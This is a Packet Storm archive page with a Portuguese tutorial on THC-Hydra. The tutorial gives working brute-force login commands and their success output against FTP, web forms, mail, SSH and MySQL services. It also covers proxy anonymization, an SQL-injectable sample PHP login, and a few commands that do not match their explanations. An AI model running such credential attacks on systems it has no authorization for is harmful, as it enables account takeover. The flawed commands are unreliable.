what you don't know can hurt you

THC-Hydra 2.1 Tutorial

THC-Hydra 2.1 Tutorial
Posted May 28, 2012
Authored by MDH3LL

This is a tutorial on using THC-Hydra version 2.1. Written in Portuguese.

tags | paper
MD5 | a993c4f44d6a72524615998e219275ad

THC-Hydra 2.1 Tutorial

Change Mirror Download
 _   _               _               _           
| |_| |__ ___ | |__ _ _ __| |_ __ __ _
| __| '_ \ / __|____| '_ \| | | |/ _` | '__/ _` |
| |_| | | | (_|_____| | | | |_| | (_| | | | (_| |
\__|_| |_|\___| |_| |_|\__, |\__,_|_| \__,_|
|___/ TUTORIAL BÁSICO THC-HYDRA [PT-BR] ver 2.1 (Rev)

________________________________________________________________________________

Dom 27 Mai 2012 19:45:17 BRT - Por : MDH3LL
- Contato : mdh3ll@gmail.com
- Data : Dom 21 Maio 2012
- Tutorial Ver : 2.1
________________________________________________________________________________

********************************************************************************
Leia com Atenção!

Não me responsabilizo pelo uso que você leitor ou qualquer outra pessoa venha
a fazer com o conhecimento adquirido nesse tutorial.

O tutorial foi escrito exclusivamente com o intuito de ajudar pessoas
que não dominam idiomas estrangeiros e tem dificuldade de entender
sobre o funcionamento do THC-Hydra.

Preserve os créditos.
********************************************************************************

INDICE :
________________________________________________________________________________

[0x00] - Sobre THC-Hydra.
[0x01] - Compilando THC-HYDRA no Linux.
+ Bibliotecas suplementares.
+ Conhecendo o PW-Inspector sem muitos detalhes.
+ Tratando wordlist sem usar o PW-Inspector.
+ Executando Hydra.
[0x02] - Opções Hydra.
[0x03] - Exemplos Hydra.
+ Exemplo FTP
+ Exemplo http-head
+ Exemplo http-post-form
+ Exemplo http-get-form
+ Exemplo POP3
+ Exemplo SMTP
+ Exemplo IMAP
+ Exemplo SSH
+ Exemplo MYSQL
[0x04] - Proxy.
________________________________________________________________________________

################################################################################
[0x00] Sobre THC-Hydra
################################################################################


* THC-Hydra: Open Source/Multiplataforma/
* Desenvolvido por uma organização Alemã chamada "The Hacker's Choice"(THC).
* O Programa pode ser adquirido gratuitamente no site oficial do projeto : http://www.thc.org/thc-hydra/

Hydra usa um mecanismo de FORÇA BRUTA/BRUTE FORCE (ou busca exaustiva):
Este tipo de ataque consiste em fazer o programa trabalhar exaustivamente
tentando combinações de senhas e nomes de usuários até chegar
ao seu objetivo obvio.

Serviços suportados (v 7.1) :

AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET,
HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET,
HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP,
MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere,
PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP,
SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2),
Telnet, VMware-Auth, VNC and XMPP.


################################################################################
[0x01] Compilando THC-HYDRA no Linux :
################################################################################

baixar source, descompacta , entra no diretório criado :
--------------------------------------------------------------------------------
$ wget http://www.thc.org/releases/hydra-7.1-src.tar.gz
$ tar -vzxf hydra-7.1-src.tar.gz
$ cd hydra-7.1-src/
--------------------------------------------------------------------------------

Configurações opcionais :
--disable-xhydra não compila o xhydra (hydra GUI)
--prefix=/opt/hydra diz onde vai ser instalado o hydra.

--------------------------------------------------------------------------------
$ ./configure --disable-xhydra --prefix=/opt/hydra
--------------------------------------------------------------------------------

compila, instala e cria link simbólico :
--------------------------------------------------------------------------------
# make && make install && ln -s /opt/hydra/hydra /usr/bin
--------------------------------------------------------------------------------

Caso queira usar o pw-inspector criar um link simbólico pra ele também :
--------------------------------------------------------------------------------
# ln -s /opt/hydra/pw-inspector /usr/bin
--------------------------------------------------------------------------------


================================================================================
Bibliotecas suplementares THC-HYDRA no Linux :
================================================================================

Para usar módulos como (ssh / mysql) é preciso instalar bibliotecas suplementares.

Para o modulo mysql é possível instalar direto dos repositórios de qualquer
Debian-like.
--------------------------------------------------------------------------------
# apt-get install libmysqlclient-dev
--------------------------------------------------------------------------------

Para o modulo ssh segue os passos que usei no debian 6.
--------------------------------------------------------------------------------
# apt-get install cmake openssl zlib build-essential
$ wget http://www.libssh.org/files/0.4/libssh-0.4.0.tar.gz
$ tar -vzxf libssh-0.4.0.tar.gz && cd libssh-0.4.0
$ mkdir build && cd build
$ cmake -DWITH_SSH1=ON -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=/usr ..
# make && make install
--------------------------------------------------------------------------------

Depois basta compilar o hydra novamente :
--------------------------------------------------------------------------------
$ wget http://www.thc.org/releases/hydra-7.1-src.tar.gz
$ tar -vzxf hydra-7.1-src.tar.gz
$ cd hydra-7.1-src/
$ ./configure --disable-xhydra --prefix=/opt/hydra
# make && make install
--------------------------------------------------------------------------------


================================================================================
PW-Inspector :
================================================================================

PW-Inspector é um utilitário que vem ao pacote Hydra e serve exclusivamente pra
tratar wordlists conforme os paramentos passados.

opções do 'pw-inspector' :

********************************************************************************
Options:
-i FILE file to read passwords from (default: stdin)
-o FILE file to write valid passwords to (default: stdout)
-m MINLEN minimum length of a valid password
-M MAXLEN maximum length of a valid password
-c MINSETS the minimum number of sets required (default: all given)
Sets:
-l lowcase characters (a,b,c,d, etc.)
-u upcase characters (A,B,C,D, etc.)
-n numbers (1,2,3,4, etc.)
-p printable characters (which are not -l/-n/-p, e.g. $,!,/,(,*, etc.)
-s special characters - all others not withint the sets above
********************************************************************************

Segue as opções :

-i FILE nome da wordlist pra ser tratada (default: stdin).
-o FILE nome para o arquivo saída com o conteúdo já tratado (default: stdout).
-m Tamanho minimo da senha.
-M Tamanho máximo da senha.
-c MINISETS número minimo de sets necessários.

Sets:
-l Caracteres minúsculos (a,b,c,d, etc.)
-u Caracteres maiúsculos (A,B,C,D, etc.)
-n Números (1,2,3,4, etc.)
-p Aqui são os caracteres que não se encaixam -l/-u/-n em são eles $,!,/,(,*, etc.)
-s Caracteres especiais - são todos que não encaixam em nenhum dos sets acima.


Exemplos :

Criar wordlist suja para o teste :
--------------------------------------------------------------------------------
$ perl -le 'print map { ("a".."z", "A".."Z", 0..9)[rand 62] } 1..rand 10 for 1..100000' >> wordlist_suja.txt
--------------------------------------------------------------------------------

Usando o pw-inspector pra filtrar a wordlist "suja" e redirecionar para um novo arquivo apenas
as senhas que possuam o comprimento >= 6 && comprimento <= 8.
--------------------------------------------------------------------------------
$ pw-inspector -i wordlist_suja.txt -o wordlist_limpa.txt -m 6 -M 8
--------------------------------------------------------------------------------

Redirecionando saída padrão (stdout) para o sor ordenar.
--------------------------------------------------------------------------------
$ pw-inspector -i wordlist_suja.txt -m 6 -M 8 | sort >> wordlist_limpa_sort.txt
--------------------------------------------------------------------------------

Redirecionando conteúdo ordenado para a entrada padrão (stdin) :
--------------------------------------------------------------------------------
$ sort wordlist_suja.txt | pw-inspector -m 6 -M 8 >> wordlist_limpa_sort.txt
--------------------------------------------------------------------------------

Para o próximo caso não sera possível pegar nada se a wordlist_suja.txt foi criada
o script disponibilizado neste tutorial porque obriguei o pw-inspector a pegar
apenas as senhas que contenham os 2 sets
(números e caracteres especiais que definitivamente não existe na wordlist).
--------------------------------------------------------------------------------
$ sort wordlist_suja.txt | pw-inspector -m 4 -M 4 -c 2 -n -s
--------------------------------------------------------------------------------

Se o número minimo fosse setado pra 1 pegaria as senhas que contenham o "set" -n (números).

================================================================================
Tratando wordlist sem usar o PW-Inspector.
================================================================================

Particularmente prefiro tratar as wordlists sem usar o pw-inspector que não
atende as minhas necessidades.

Os exemplos abaixo usam comandos simples que qualquer usuário Linux deveria conhecer.

Juntando wordlists :
--------------------------------------------------------------------------------
cat wordlist_1.txt wordlist_2.txt wordlist_3.txt >> wordlist_final.txt
--------------------------------------------------------------------------------

Ordenando e removendo senhas duplicadas :
--------------------------------------------------------------------------------
$ sort wordlist_suja.txt | uniq -u
--------------------------------------------------------------------------------

Pegando senhas com o comprimento 2 a 4 contento apenas números :
--------------------------------------------------------------------------------
$ sort wordlist_suja.txt | grep -P "^[0-9]{6,8}$"
--------------------------------------------------------------------------------

Pegando senhas [a-z0-9] com apenas 6 caracteres :
--------------------------------------------------------------------------------
$ sort wordlist_suja.txt | grep -P "^[a-z0-9]{6}$"
--------------------------------------------------------------------------------

Pegando senhas [a-zA-Z] com qualquer comprimento,removendo senhas duplicadas e
jogando o conteúdo para um novo arquivo chamado "wordlist_mdh3ll.txt"
--------------------------------------------------------------------------------
$ sort wordlist_suja.txt | grep -P "^[a-zA-Z]*$" | uniq -u >> wordlist_mdh3ll.txt
ou
$ sort wordlist_suja.txt | grep -Pi "^[a-z]*$" | uniq -u >> wordlist_mdh3ll.txt
--------------------------------------------------------------------------------

Pegando senhas que comece com "1" e termine com "w".
--------------------------------------------------------------------------------
$ cat wordlist_suja.txt | grep -P "^1.*w$"
--------------------------------------------------------------------------------

Convertendo caracteres maiúsculos para minúsculos.
--------------------------------------------------------------------------------
$ cat wordlist_suja.txt | tr '[:upper:]' '[:lower:]' >> wordlist_minusculo.txt
ou
$ perl -ne 'print lc $_' wordlist_suja.txt
--------------------------------------------------------------------------------

================================================================================
Executando Hydra :
================================================================================

Rode 'hydra' no terminal:

********************************************************************************
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE]
[-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT]
[-x MIN:MAX:CHARSET] [-SuvV46] [server service [OPT]]|[service://server[:PORT][/OPT]]

Options:
-R restore a previous aborted/crashed session
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-e ns additional checks, "n" for null password, "s" try login as pass
-u loop around users, not passwords (implied when using -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE server list for parallel attacks, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f exit after the first found login/password pair (per host if -M)
-t TASKS run TASKS number of connects in parallel (default: 16)
-w / -W TIME waittime for responses (32s) / between connects per thread
-4 / -6 prefer IPv4 (default) or IPv6 addresses
-v / -V verbose mode / show login+pass combination for each attempt
-U service module usage details
server the target server (use either this OR the -M option)
service the service to crack. Supported protocols: cisco cisco-enable cvs ftp[s] http[s]-{head|get} http[s]-{get|post}-form http-proxy icq imap irc ldap2 ldap3[-{cram|digest}md5] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3 rdp rexec rlogin rsh sip smb smtp smtp-enum snmp socks5 teamspeak telnet vmauthd vnc xmpp
OPT some service modules need special input (use -U to see module help)

... ...
********************************************************************************
Podemos ver acima que quando executado exibe informações como sintaxe,opções etc.



################################################################################
[0x02] Opções hydra :
################################################################################

-R Restaura sessões abordadas/quebradas.
-S Realiza conexão segura usando SSL caso seja necessário.
-s Especifica o número da porta usada para estabelecer a conexão.
-l Especifica "login" da vitima.
-L Carrega uma lista contendo "logins" de vitimas (1 por linha).
-p Especifica senha.
-P Especifica o arquivo contendo as "passwords" (1 por linha).

-x MIN:MAX:CHARSET Gerador de senhas
Opções de geração :

* MIN - número minimo de caracteres gerados.
* MAX - número máximo de caracteres gerados.
* CHARSET - especifica os sets de caracteres.

a - letras minusculas.
A - letras maiúsculas.
1 - números.
para qualquer outro use o caractere pertencente.

Exemplos :
-x 3:5:a Gera senha com o comprimento [3-5] contendo caracteres [a-z].
-x 5:8:A Gera senha com o comprimento [5-8] contendo caracteres [A-Z].
-x 5:8:A1 Gera senha com o comprimento [5-8] com caracteres [A-Z0-9]
-x 1:3:/ Gera senha com o comprimento [1-3] contendo apenas / barra.
-x 1:3:/%,.- Gera senha com o comprimento [1-3] contendo / % , . -

-e nsr 'n' testa senha em branco /
's' testa user como password /
'r' testa senha invertida

-u Não sei como funciona.
-C Usado pra carregar um arquivo contendo usuário:senha (equivale a -L/-P).
-M Carrega lista de servidores pra ataque paralelo (1 por linha).
-o Salva as senhas encontradas no arquivo especificado.
-f Faz o programa parar de trabalhar quando a senha ou usuário for encontrado.
-t Limita o número de conexões paralelas (default: 16).
-w/-W Define Tempo máximo pra esperar respostar do servidor (default: 30s).
-4/-6 preferir endereços IPv4 (default) ou endereços IPv6.
-v/-V Modo [-v]erbose normal / [-V]erbose detalhado.
-U Detalha do modulo especificado.

Server: Servidor alvo.
Exemplos:
127.0.0.1
localhost
pop.gmail.com
pop.mail.yahoo.com.br
pop3.live.com

Service: serviço/modulo/protocolo.
Exemplos:
pop3
ftp
smtp
vnc
imap
http-head
http-post-form
http-get-form


################################################################################
[0x03] Exemplos:
################################################################################

Pratica das opções [0x02] deste tutorial.

================================================================================
Exemplo FTP
================================================================================

Sintaxe:
--------------------------------------------------------------------------------
hydra -l root -P pass.txt -w 15 localhost ftp
--------------------------------------------------------------------------------

__________________________________________________________
|________________________Terminal____________________|-|_|X|
|| ||
|| mdh3ll@debian:~$ ftp ||
|| ftp> o ||
|| (to) localhost ||
|| Connected to localhost. ||
|| 220 ProFTPD 1.3.3d Server (ProFTPD) [::ffff:127.0.0.1] ||
|| Name (localhost:mdh3ll): ||
|| ||
||________________________________________________________||
|__________________________________________________________|


Saída:
********************************************************************************
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-11 12:25:52
[DATA] 16 tasks, 1 server, 46 login tries (l:1/p:46), ~2 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 127.0.0.1 login: nobody password: culture123
[STATUS] attack finished for localhost (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-09-11 12:25:53
********************************************************************************

Encontrou :
[21][ftp] host: 127.0.0.1 login: nobody password: culture123


================================================================================
Exemplo http-head
================================================================================

Sintaxe:
--------------------------------------------------------------------------------
hydra -L users.txt -P pass.txt -o out.txt localhost http-head /colt/
--------------------------------------------------------------------------------

__________________________________________________________
|__Mozilla Firefox___________________________________|-|_|X|
||_http://localhost/colt/________________________________ ||
|| ||
|| ||
|| __________________________________________ ||
|| |__Autenticação solicitada_______________|X| ||
|| |O servidor localhost:80 requer um nome de | ||
|| |usuário e senha.O servidor diz:colt user | ||
|| | ____________________ | ||
|| | nome de usuário: |_______mdh3ll_______| | ||
|| | Senha: |___**************___| | ||
|| | __________ _______ | ||
|| |___________________|_cancelar_|_|_login_|_| ||
|| ||
|| ||
|| ||
|| ||
||________________________________________________________||
|_Concluído________________________________________________|

Saída:
********************************************************************************
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-11 12:19:16
[DATA] 16 tasks, 1 server, 46 login tries (l:1/p:46), ~2 tries per task
[DATA] attacking service http-head on port 80
[80][www] host: 127.0.0.1 login: lampp password: culture123
[STATUS] attack finished for localhost (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-09-11 12:19:16
********************************************************************************

O Hydra encontrou o e salvou no arquivo out.txt :
--------------------------------------------------------------------------------
usuario:lampp senha:culture123
--------------------------------------------------------------------------------


================================================================================
Exemplo http-post-form
================================================================================

Sintaxe : <url>:<form parameters>:<condition string>[:<optional>[:<optional>]


código fonte do index.html ilustrativo :


http://127.0.0.1/login/index.html
--------------------------------------------------------------------------------
<html>
<head><title>Login</title></head>
<body>
<form method="POST" action="logar.php">
<p> Nome </p></BR>
<input type="text" name="user"></br>
<p> Senha </p></BR>
<input type="password" name="pass"></br>
<input type="submit" name="enviar" value="Enviar">
</form>
</body>
</html>
--------------------------------------------------------------------------------

__________________________________________________________
|__Mozilla Firefox__________Login____________________|-|_|X|
||_http://127.0.0.1/login/index.html______________________ |
|| ||
|| Nome ||
|| _____________________________________ ||
|| | | ||
|| |_____________________________________| ||
|| ||
|| Senha ||
|| _____________________________________ ||
|| | | ||
|| |_____________________________________| ||
|| ||
|| ________________ ||
|| | Enviar | ||
|| |________________| ||
|| ||
||________________________________________________________||
|_Concluído________________________________________________|

logar.php ilustrativo :
--------------------------------------------------------------------------------
<?
# logar.php ilustrativo
$user = $_POST['user'];
$pass = $_POST['pass'];

if($user == "admin" && $pass == "culture123"){
echo "Logado com sucesso!";
}else{
echo "Usuario ou senha invalida!";
}
?>
--------------------------------------------------------------------------------

Sintaxe simples fica assim :
--------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o out.txt -t 1 -f 127.0.0.1 http-post-form "/login/logar.php:user=^USER^&pass=^PASS^:Usuario ou senha invalida"
--------------------------------------------------------------------------------

Para criar esta sintaxe foi preciso :

Valor do atributo action do <form> : logar.php
Valor do atributo referente ao nome e senha de usuário nas tags <input> dentro do <form>: name , pass
Mensagem de erro ou parte dela: "Usuário ou senha invalida"

- O uso do caractere coringa é permitido : .*senha invalida
- É possível usar uma mensagem de sucesso adicionando S= antes da mensagem :

--------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o out.txt -t 1 -f -w 15 127.0.0.1 http-post-form "/login/logar.php:user=^USER^&pass=^PASS^:S=Logado com sucesso"
--------------------------------------------------------------------------------


Saída:
********************************************************************************
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-11 12:51:14
[DATA] 1 task, 1 server, 47 login tries (l:1/p:47), ~47 tries per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 127.0.0.1 login: admin password: culture123
[STATUS] attack finished for 127.0.0.1 (valid pair found)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-09-11 12:51:14
********************************************************************************

Para obter mais detalhes execute : ./hydra -U http-post-form


================================================================================
Exemplo http-get-form
================================================================================

http-get-form vai seguir o mesmo modelo do http-post-form

--------------------------------------------------------------------------------
# index.html ilustrativo (http://127.0.0.1/index.html)

<html>
<head><title>Login</title></head>
<body>
<form method="GET" action="enviar.php">
<p> Nome </p></BR>
<input type="text" name="tx_nome"></br>
<p> Senha </p></BR>
<input type="password" name="tx_senha"></br>
<input type="submit" name="go" value="Go">
</form>
</body>
</html>
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
# enviar.php ilustrativo (http://127.0.0.1/enviar.php)

<?php
# eviar.php ilustrativo
require_once('conectar.php');

$user = $_GET['tx_nome'];
$pass = $_GET['tx_senha'];

$pass = md5($pass);
$pesquisa = MYSQL_QUERY("select usuario,senha from TBLogin where usuario = \"$user\" AND senha = \"$pass\"");
$resultado = mysql_num_rows($pesquisa);
if($resultado == 1){
echo "Logado com sucesso";
}else{
echo "Algo esta errado";
}
?>
--------------------------------------------------------------------------------

Sintaxe completa fica assim :
--------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o out.txt -t 1 -f 127.0.0.1 http-get-form "enviar.php:user=^USER^&pass=^PASS^:Algo esta errado"
-----------------------------------------------------------------------------------

A Única mudança significativa é a troca do modulo "http-post-form" por "http-get-form"
na sintaxe.

Para obter mais detalhes execute : ./hydra -U http-get-form

================================================================================
Exemplo POP3
================================================================================
Sintaxe:
--------------------------------------------------------------------------------
hydra -L users.txt -p 123456 -S pop3.dominio.com pop3
--------------------------------------------------------------------------------

Saída:
********************************************************************************
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-01-28 00:55:28
[DATA] 9 tasks, 1 servers, 9 login tries (l:9/p:1), ~1 tries per task
[DATA] attacking service pop3 on port 110
[STATUS] attack finished for pop3.xxx.com (waiting for childs to finish)
[110][pop3] host: pop3.dominio.com login: user@dominio.com.br password: 123456
********************************************************************************


================================================================================
Exemplo SMTP
================================================================================
Sintaxe :
--------------------------------------------------------------------------------
hydra -l admin@dominio.com -P pass.txt smtp.mail.dominio.com smtp
--------------------------------------------------------------------------------

Saída:
********************************************************************************
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2011-10-11 15:06:54
[DATA] 4 tasks, 1 server, 4 login tries (l:1/p:4), ~1 try per task
[DATA] attacking service smtp on port 25
[25][smtp] host: xxx.xxx.xxx.xxx login: admin@dominio.com password: cabal12ea13
********************************************************************************


================================================================================
Exemplo IMAP
================================================================================
Sintaxe :
--------------------------------------------------------------------------------
hydra -l nobody@dominio.com -P pass.txt -S imap.dominio.com imap
--------------------------------------------------------------------------------

Saída:
********************************************************************************
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2011-10-11 20:46:33
[DATA] 5 tasks, 1 server, 5 login tries (l:1/p:5), ~1 try per task
[DATA] attacking service imap on port 993
[993][imap] host: xx.xxx.xx.xxx login: nobody@dominio.com password: love1234
[STATUS] attack finished for imap.dominio.com (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-10-11 20:46:37
********************************************************************************


================================================================================
Exemplo SSH
================================================================================

__________________________________________________________
|________________________Terminal____________________|-|_|X|
|| ||
||mdh3ll@debian:~$ ssh teste@192.168.1.4 ||
||The authenticity of host '192.168.1.4 (192.168.1.4)'\ ||
|| can't be established. ||
||RSA key fingerprint is xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx ||
||Are you sure you want to continue\ ||
|| connecting (yes/no)? yes ||
||Warning: Permanently added '192.168.1.4' (RSA)\ ||
|| to the list of known hosts. ||
||teste@192.168.1.4's password: ||
||________________________________________________________||
|__________________________________________________________|

Sintaxe :
--------------------------------------------------------------------------------
hydra -l teste -x 6:6:1 -s 22 192.168.1.4 ssh
--------------------------------------------------------------------------------

Saída :
********************************************************************************
Hydra (http://www.thc.org/thc-hydra) starting at 2011-10-13 16:44:47
[DATA] 16 tasks, 1 server, 1000000 login tries (l:1/p:1000000), ~62500 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.4 login: teste password: 000138
[STATUS] attack finished for 192.168.1.4 (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-10-13 16:45:26
********************************************************************************


================================================================================
Exemplo MYSQL
================================================================================

Sintaxe :
--------------------------------------------------------------------------------
hydra -l root -P pass.txt -t 4 127.0.0.1 mysql
--------------------------------------------------------------------------------

********************************************************************************
Hydra (http://www.thc.org/thc-hydra) starting at 2011-10-14 19:09:23
[DATA] 4 tasks, 1 servers, 32 login tries (l:1/p:32), ~8 tries per task
[DATA] attacking service mysql on port 3306
[3306][mysql] host: 127.0.0.1 login: root password: Password01
[STATUS] attack finished for 127.0.0.1 (waiting for childs to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-10-14 19:09:32
********************************************************************************


################################################################################
[0x04] Proxy:
################################################################################

Proxy web:

O uso de proxy no hydra se limita em definir uma nova variável de ambiente
com nome relacionado ao conteúdo.

Proxy HTTP :
--------------------------------------------------------------------------------
HYDRA_PROXY_HTTP="http://123.45.67.89:8080/"
--------------------------------------------------------------------------------

Para qualquer outro use : HYDRA_PROXY_CONNECT
--------------------------------------------------------------------------------
HYDRA_PROXY_CONNECT=proxy.anonymizer.com:8000
--------------------------------------------------------------------------------

Com autentificação :
--------------------------------------------------------------------------------
HYDRA_PROXY_AUTH="nome:senha"
--------------------------------------------------------------------------------

pra saber se o proxy foi definido use echo $VARIAVEL_DEFINIDA no terminal :

--------------------------------------------------------------------------------
$ echo HYDRA_PROXY_HTTP
$ echo HYDRA_PROXY_CONNECT
$ echo HYDRA_PROXY_AUTH
--------------------------------------------------------------------------------

a saída deve retornar o conteúdo que você definiu na variável.

(Preserve os créditos do autor)

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    10 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    1 Files
  • 19
    Aug 19th
    11 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close